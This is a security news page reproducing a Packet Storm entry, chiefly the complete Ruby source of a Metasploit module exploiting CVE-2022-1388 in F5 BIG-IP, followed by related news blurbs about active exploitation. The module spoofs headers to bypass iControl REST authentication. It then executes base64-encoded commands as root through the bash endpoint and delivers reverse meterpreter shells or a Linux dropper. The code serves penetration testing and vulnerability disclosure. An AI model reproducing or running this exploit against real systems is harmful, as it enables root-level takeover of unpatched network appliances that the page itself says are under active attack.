Security
Headlines
HeadlinesLatestCVEs

Headline

F5 BIG-IP iControl Remote Code Execution

This Metasploit module exploits an authentication bypass vulnerability in the F5 BIG-IP iControl REST service to gain access to the admin account, which is capable of executing commands through the /mgmt/tm/util/bash endpoint. Successful exploitation results in remote code execution as the root user.

Packet Storm
#vulnerability#linux#js#git#java#rce#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'F5 BIG-IP iControl RCE via REST Authentication Bypass',        'Description' => %q{          This module exploits an authentication bypass vulnerability          in the F5 BIG-IP iControl REST service to gain access to the          admin account, which is capable of executing commands          through the /mgmt/tm/util/bash endpoint.          Successful exploitation results in remote code execution          as the root user.        },        'Author' => [          'Heyder Andrade', # Metasploit module          'alt3kx <alt3kx[at]protonmail.com>', # PoC          'James Horseman', # Technical Writeup          'Ron Bowes' # Documentation of exploitation specifics        ],        'References' => [          ['CVE', '2022-1388'],          ['URL', 'https://support.f5.com/csp/article/K23605346'],          ['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/'], # Writeup          ['URL', 'https://github.com/alt3kx/CVE-2022-1388_PoC'] # PoC        ],        'License' => MSF_LICENSE,        'DisclosureDate' => '2022-05-04', # Vendor advisory        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'DefaultOptions' => {                'CMDSTAGER::FLAVOR' => :bourne,                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 1, # Linux Dropper avoids some timeout issues that Unix Command payloads sometimes encounter.        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.          'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session          'SideEffects' => [            IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)            ARTIFACTS_ON_DISK # CmdStager          ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),        OptString.new('HttpUsername', [true, 'iControl username', 'admin']),        OptString.new('HttpPassword', [true, 'iControl password', ''])      ]    )    register_advanced_options([      OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])    ])  end  def check    print_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),      'method' => 'GET'    })    return CheckCode::Unknown unless res&.code == 401    body = res.get_json_document    return CheckCode::Safe unless body.key?('message') && body['kind'] == ':resterrorresponse'    signature = Rex::Text.rand_text_alpha(13)    stub = "echo #{signature}"    res = send_command(stub)    return CheckCode::Safe unless res&.code == 200    body = res.get_json_document    return CheckCode::Safe unless body['kind'] == 'tm:util:bash:runstate'    return CheckCode::Vulnerable if body['commandResult'].chomp == signature    CheckCode::Safe  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  end  def execute_command(cmd, _opts = {})    vprint_status("Executing command: #{cmd}")    res = send_command(cmd)    unless res      print_warning('Command execution timed out')      return    end    json = res.get_json_document    unless res.code == 200 && json['kind'] == 'tm:util:bash:runstate'      fail_with(Failure::PayloadFailed, 'Failed to execute command')    end    print_good('Successfully executed command')    return unless (cmd_result = json['commandResult'])    vprint_line(cmd_result)  end  def send_command(cmd)    bash_cmd = "eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)"    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),      'ctype' => 'application/json',      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),      'headers' => {        'Host' => 'localhost',        'Connection' => 'keep-alive, X-F5-Auth-Token',        'X-F5-Auth-Token' => Rex::Text.rand_text_alpha_lower(6)      },      'data' => {        'command' => 'run',        'utilCmdArgs' => "-c '#{bash_cmd}'"      }.to_json    }, datastore['CmdExecTimeout'])  endend

Related news

U.S. Agencies Warn of Iranian Hacking Group's Ongoing Ransomware Attacks

U.S. cybersecurity and intelligence agencies have called out an Iranian hacking group for breaching multiple organizations across the country and coordinating with affiliates to deliver ransomware. The activity has been linked to a threat actor dubbed Pioneer Kitten, which is also known as Fox Kitten, Lemon Sandstorm (formerly Rubidium), Parisite, and UNC757, which it described as connected to

Major Cybersecurity Agencies Collaborate to Unveil 2022's Most Exploited Vulnerabilities

A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022. "In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five

3 Flaws, 1 War Dominated Cyber-Threat Landscape in 2022

Attackers continued to favor software exploits, phishing, and stolen credentials as initial-access methods last year, as Log4j and the Russia-Ukraine cyber conflict changed the threat landscape.

Joint Advisory AA22-279A and Vulristics

Hello everyone! This episode will be about the new hot twenty vulnerabilities from CISA, NSA and FBI, Joint cybersecurity advisory (CSA) AA22-279A, and how I analyzed these vulnerabilities using my open source project Vulristics. Alternative video link (for Russia): https://vk.com/video-149273431_456239105 Americans can’t just release a list of “20 vulnerabilities most commonly exploited in attacks on […]

Chinese APT's favorite vulnerabilities revealed

Categories: Exploits and vulnerabilities Categories: News Tags: Chinese APT Tags: advanced persistent threat Tags: APT Tags: CISA Tags: NSA Tags: FBI Tags: security advisory CISA, the NSA and the FBI have compiled a list of the vulnerabilities targeted by state-sponsorted threat actors from China. (Read more...) The post Chinese APT's favorite vulnerabilities revealed appeared first on Malwarebytes Labs.

Vulnerability Exploits, Not Phishing, Are the Top Cyberattack Vector for Initial Compromise

A slew of Microsoft Exchange vulnerabilities (including ProxyLogon) fueled a surge in attacks targeting software flaws in 2021, but the trend has continued this year.

Attackers Have 'Favorite' Vulnerabilities to Exploit

While attackers continue to rely on older, unpatched vulnerabilities, many are jumping on new vulnerabilities as soon as they are disclosed.

EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities

A nascent Linux-based botnet named Enemybot has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS). "The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities," AT&T Alien Labs said in a technical write-up published last week. "Services

Threat Source newsletter (May 19, 2022) — Why I'm missing the days of iPods and LimeWire

By Jon Munshaw.  Welcome to this week’s edition of the Threat Source newsletter.  I will openly admit that I still own a “classic” iPod — the giant brick that weighed down my skinny jeans in high school and did nothing except play music. There are dozens of hours of music on there that I... [[ This is only the beginning! Please visit the blog for the complete entry ]]

VMware Releases Patches for New Vulnerabilities Affecting Multiple Products

VMware has issued patches to contain two security flaws impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks. The first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior

CISA: Unpatched F5 BIG-IP Devices Under Active Attack

Publicly released proof-of-concept exploits are supercharging attacks against unpatched systems, CISA warns.

F5 BIG-IP vulnerability is now being used to disable servers

At least one group of threat actors is using the recently patched vulnerability in F5 BIG-IP to wipe the file system of vulnerable devices. The post F5 BIG-IP vulnerability is now being used to disable servers appeared first on Malwarebytes Labs.

CISA Urges Organizations to Patch Actively Exploited F5 BIG-IP Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the recently disclosed F5 BIG-IP flaw to its Known Exploited Vulnerabilities Catalog following reports of active abuse in the wild. The flaw, assigned the identifier CVE-2022-1388 (CVSS score: 9.8), concerns a critical bug in the BIG-IP iControl REST endpoint that provides an unauthenticated adversary with a method to

Threat Advisory: Critical F5 BIG-IP Vulnerability

Summary A recently disclosed vulnerability in F5 Networks' BIG-IP could allow an unauthenticated attacker to access the BIG-IP system to execute arbitrary system commands, create and delete files, disable services and could lead to additional malicious activity. This vulnerability, tracked as... [[ This is only the beginning! Please visit the blog for the complete entry ]]

Hackers Actively Exploit F5 BIG-IP Bug

The bug has a severe rating of 9.8, public exploits are released.

How to Check if Your F5 BIG-IP Device Is Vulnerable

This Tech Tip walks network administrators through the steps to address the latest critical remote code execution vulnerability (CVE-2022-1388) in F5's BIG-IP management interface.

F5 BIG-IP Remote Code Execution

F5 BIG-IP remote code execution proof of concept exploit that leverages the vulnerability identified in CVE-2022-1388.

Update now! F5 BIG-IP vulnerability being actively exploited

Only a few days after the release of the patch for a vulnerability in F5 BIG-IP, exploits were developed and are now being deployed. The post Update now! F5 BIG-IP vulnerability being actively exploited appeared first on Malwarebytes Labs.

CVE-2022-1388

On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution